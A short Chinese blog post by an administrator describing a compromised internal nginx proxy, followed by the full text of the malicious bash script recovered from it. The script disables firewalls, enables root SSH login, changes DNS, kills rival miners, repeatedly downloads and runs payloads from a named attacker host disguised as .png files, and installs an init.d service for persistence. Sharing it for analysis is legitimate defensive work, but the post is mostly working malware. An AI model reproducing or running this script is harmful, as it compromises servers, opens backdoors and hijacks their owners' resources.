月常抓病毒水文
这次也是注入,不过都能搞到内网服务器了。
被入侵的服务器是内网的nginx代理服务器,默认文件倒是没有被删除,但跑满了的CPU实在不能忍。
抓到文件,就当是复习shell脚本了,技术不到家,代码容易被攻破啊。
攻击者获取文件地址:xia.beihaixue.com(香港)
#!/bin/bash
#chkconfig: 2345 88 14
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function kills() {
#ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid
#do
#pkill -f $procid
#done
sed -i '/nameserver*/d' /etc/resolv.conf
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
needreset=1;
iptables -I INPUT -p TCP --dport 1522 -j ACCEPT
iptables -I INPUT -p TCP --dport 3307 -j ACCEPT
iptables -I INPUT -p TCP --dport 6001 -j ACCEPT
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
sed -i '/PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
/etc/init.d/iptables stop
service iptables stop
sUsEFirewall2 stopresUsEFirewall2 stop
systemctl stop firewalld.service
systemctl disable firewalld.service
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
pkill -f AnXqV.yam
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f my.confe
pkill -f pprt
pkill -f ppol
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
PORT_NUMBER=9999
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=5555
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=7777
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=14444
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
apt-get install -y sysv-rc-conf
}
function downloadyam() {
if [ ! -f "/etc/my.conf" ]; then
curl http://xia.beihaixue.com/my.png -o /etc/my.conf && chmod 0777 /etc/my.conf
if [ ! -f "/etc/my.conf" ]; then
wget http://xia.beihaixue.com/my.png -O /etc/my.conf && chmod 0777 /etc/my.conf
rm -rf /etc/my.conf.*
fi
if [ ! -f "/etc/my.conf" ]; then
curl http://xia.beihaixue.com/my.png -o /etc/my.conf && chmod 0777 /etc/my.conf
rm -rf /etc/my.conf.*
fi
if [ ! -f "/etc/my.conf" ]; then
wget http://xia.beihaixue.com/my.png -O /etc/my.conf && chmod 0777 /etc/my.conf
rm -rf /etc/my.conf.*
fi
#sed -i '1a\nameserver 8.8.8.8\n' /etc/resolv.conf
nohup /etc/my.conf &
else
p=$(ps aux | grep my.conf | grep -v grep | wc -l)
if [ ${p} -eq 1 ];then
echo "my.conf"
elif [ ${p} -eq 0 ];then
nohup /etc/my.conf -P my.conf>/dev/null 2>&1 &
else
echo ""
fi
fi
}
function downloadyam1() {
if [ ! -f "/var/ssh.conf" ]; then
curl http://xia.beihaixue.com/sso.png -o /var/ssh.conf && chmod 0777 /var/ssh.conf
if [ ! -f "/var/ssh.conf" ]; then
wget http://xia.beihaixue.com/sso.png -O /var/ssh.conf && chmod 0777 /var/ssh.conf
rm -rf /var/ssh.conf.*
fi
if [ ! -f "/var/ssh.conf" ]; then
curl http://xia.beihaixue.com/sso.png -o /var/ssh.conf && chmod 0777 /var/ssh.conf
rm -rf /var/ssh.conf.*
fi
if [ ! -f "/var/ssh.conf" ]; then
wget http://xia.beihaixue.com/sso.png -O /var/ssh.conf && chmod 0777 /var/ssh.conf
rm -rf /var/ssh.conf.*
fi
nohup /var/ssh.conf &
else
p=$(ps aux | grep ssh.conf | grep -v grep | wc -l)
if [ ${p} -eq 1 ];then
echo "ssh.conf"
elif [ ${p} -eq 0 ];then
nohup /var/ssh.conf -P ssh.conf>/dev/null 2>&1 &
else
echo ""
fi
fi
}
function downloadyam2() {
if [ ! -f "/etc/init.d/S67" ]; then
curl http://xia.beihaixue.com/s68.png -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
rm -rf /etc/init.d/S67.*
fi
if [ ! -f "/etc/init.d/S67" ]; then
wget http://xia.beihaixue.com/s68.png -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
rm -rf /etc/init.d/S67.*
fi
if [ ! -f "/etc/init.d/S67" ]; then
curl http://xia.beihaixue.com/s68.png -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
rm -rf /etc/init.d/S67.*
fi
if [ ! -f "/etc/init.d/S67" ]; then
wget http://xia.beihaixue.com/s68.png -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
rm -rf /etc/init.d/S67.*
fi
if [ -f "/usr/bin/yum" ]; then
chkconfig --add S67
chkconfig S67 on
fi
if [ -f "/usr/bin/sysv-rc-conf" ]; then
cd /etc/init.d/
sysv-rc-conf S67 on
fi
}
while [ 1 ]
do
kills
#check
downloadyam
sleep 20
downloadyam1
sleep 600
done
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
